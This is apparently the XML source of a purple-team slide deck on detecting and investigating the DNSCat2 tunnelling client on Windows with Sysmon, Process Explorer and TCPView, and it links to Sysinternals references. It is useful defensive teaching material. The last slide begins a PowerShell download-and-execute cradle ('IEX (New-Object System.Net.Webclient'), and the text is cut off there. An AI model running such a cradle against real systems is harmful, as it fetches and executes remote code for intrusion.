            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3815509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3254B-4D30-9944-9E4A-5A9C092C72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652C6C1-AF59-0442-A683-134993FE2C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3D73E0-43A7-AD4E-96B4-BC90F1799F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E6BE460-725B-A541-BF3E-1C7C17A6E1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E278DD-205C-9943-876A-36E78ED3E5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94F35C9-B2FE-B54F-8519-7FD397362A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2056E4C0-D481-A24E-A70E-5F975807C679}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/16/20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8E8FABD-FE63-9845-9D9B-2C1D606C4E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C0DC85E-F48F-A641-BE9F-D3EB25461597}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F9FCDB0-EFC0-9F46-B90A-EA993CFFEBAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1370665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BED09-1501-1C48-959C-403BD4CDA1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C6944D-E8C3-2445-A0D8-04AA05ABDF6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2056E4C0-D481-A24E-A70E-5F975807C679}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/16/20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CAC9434-9C34-2E48-971B-ED9ACEC495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B9FCCE-6892-3746-9C91-0E5DBB997395}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F9FCDB0-EFC0-9F46-B90A-EA993CFFEBAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3544299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2924BB-50B4-4B46-A45F-52FBBE159AC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2056E4C0-D481-A24E-A70E-5F975807C679}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/16/20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48F8D6D2-EFE7-9A44-AF2A-08E370DA00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76AAE1-2FEE-FA4E-93B0-6FD82FCED45D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F9FCDB0-EFC0-9F46-B90A-EA993CFFEBAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1032307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35086-BAC8-EB42-AEB7-DF08FA7119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BA5A037-C8C0-7946-A06B-307B8807DC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78C7BE-6704-2A46-AF9D-280ABB1746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A02C9B-EE35-6B45-A96E-78F44EA11702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2056E4C0-D481-A24E-A70E-5F975807C679}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/16/20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{526A7A7A-F325-7B4A-997F-225F36C666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A1EE93-9A65-6E48-B25D-BD5E92A93BE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F9FCDB0-EFC0-9F46-B90A-EA993CFFEBAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867952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45183-88BB-0343-A592-BD803245D0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983778-B103-E84C-A2DE-04D9B70742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AC9214-B288-FE47-9582-6B7FE1EB20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8EE6BD-662F-2F4B-9A2A-989018191EE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2056E4C0-D481-A24E-A70E-5F975807C679}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/16/20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532AE625-1B85-6943-8946-357919BC8B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90981E-FA3F-1042-8BDC-D4CE27FB7129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F9FCDB0-EFC0-9F46-B90A-EA993CFFEBAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2621447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B59208-4367-FE44-897E-0DDE77C601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40DE03-1A7B-744B-9348-276F476F34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27E049-8F5D-F64C-A376-0B83BAC019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56E4C0-D481-A24E-A70E-5F975807C679}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/16/20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5EE19A8-BDF3-2E4F-9186-EBD179C926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5BF9127-6ABE-EE46-8720-46D2BA5B73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9FCDB0-EFC0-9F46-B90A-EA993CFFEBAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28346816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hyperlink" Target="https://adsecurity.org/?page_id=4031" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/how-to-detect-persistence/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/archive/blogs/motiba/sysinternals-sysmon-unleashed" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://social.technet.microsoft.com/wiki/contents/articles/33895.windows-event-forwarding-survival-guide.aspx"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s://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html"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fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" TargetMode="Externa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hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/"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hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/psexec" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/accessenum" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/rootkit-revealer" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/sigcheck" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/logonsessions" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/pstools" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/shellrunas" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/psloglist" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/autologon" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/shareenum"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docs.microsoft.com/en-us/sysinternals/downloads/psfile" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/logonsessions" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/accessenum" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/whois" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/streams" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/shareenum"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SwiftOnSecurity/sysmon-config" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmo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30977-2CFE-6449-AAD3-54EC44E54B34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Purple Team</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80820EB0-6D98-5B4E-B7B3-84DD6A02BAB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection and Investigation on Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2953868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55685-1929-E641-B553-CD3A5CA5C8E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detecting DNSCat2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A1ACA69-11D6-D748-855F-EDA8C04BD19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97659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AA27C-9D67-A746-A460-3D17D13B93D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6917028" y="280115"/>
            <a:ext cx="5274971" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Sysmon sees when DNSCat2 Client is run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA218100-BB5F-3E47-A181-1B372E1B667B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="227526" y="280115"/>
            <a:ext cx="6469580" cy="6297769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D7C73A3-7E7B-EB45-94D0-22D67E3F2C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810677" y="2424783"/>
            <a:ext cx="5381323" cy="414080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32551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47E911-A1C5-2845-96EC-9715CFBB2C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4323610" y="1017431"/>
            <a:ext cx="7018618" cy="5518597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5F48F2E-B47B-974D-9788-8167D56B9F12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="284409" y="167426"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Process Explorer sees when DNSCat2 Client is run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1723438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1A0AE5-75EF-3444-81D7-CBBD4D6AD7A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="706191" y="1458868"/>
            <a:ext cx="10779617" cy="4943736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF8EA665-78C7-6C4F-9FEE-2FBC199D23A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245771" y="133305"/>
            <a:ext cx="11538397" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TCPView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sees when DNSCat2 Client is run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1685505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C610D-1C9E-014E-8ACB-781EB6270999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="665185"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNSCat2-PowerShell Client Detections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62A6C5FF-C80F-BA41-812A-7F84C6114101}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626772" y="1334887"/>
            <a:ext cx="10075572" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>System.Net.Webclient</a:t>
